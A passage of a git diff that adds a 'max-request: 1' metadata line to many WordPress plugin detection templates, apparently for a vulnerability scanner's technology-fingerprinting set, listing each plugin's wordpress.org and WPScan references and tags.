max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index b7ad16e281..48481fde3b 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 10fd071b0b..b34d196268 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1d41b4ec2c..54dce49b42 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 